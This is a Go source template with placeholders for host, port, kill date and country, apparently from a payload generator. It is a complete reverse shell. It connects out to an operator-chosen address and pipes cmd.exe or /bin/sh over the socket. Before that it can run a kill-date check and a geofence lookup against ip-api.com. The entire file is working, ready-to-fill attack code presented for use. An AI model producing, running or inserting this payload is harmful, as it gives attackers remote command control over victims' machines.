package main

import (
	"net"
	"os/exec"
	"runtime"
    "time"
    "net/http"
    "io/ioutil"
    "strings"
    "os"
)

func main() {
    // Guardrails
    {% if kill_date %}
    k, _ := time.Parse("2006-01-02", "{{ kill_date }}")
    if time.Now().After(k) {
        return
    }
    {% endif %}

    {% if geofence %}
    resp, err := http.Get("http://ip-api.com/line/?fields=countryCode")
    if err == nil {
        defer resp.Body.Close()
        body, _ := ioutil.ReadAll(resp.Body)
        cc := strings.TrimSpace(string(body))
        if cc != "{{ geofence }}" {
            return
        }
    }
    {% endif %}

	c, _ := net.Dial("tcp", "{{ ip }}:{{ port }}")
	if c == nil {
		return
	}
	
	var cmd *exec.Cmd
	if runtime.GOOS == "windows" {
		cmd = exec.Command("cmd.exe")
	} else {
		cmd = exec.Command("/bin/sh")
	}

	cmd.Stdin = c
	cmd.Stdout = c
	cmd.Stderr = c
	cmd.Run()
}
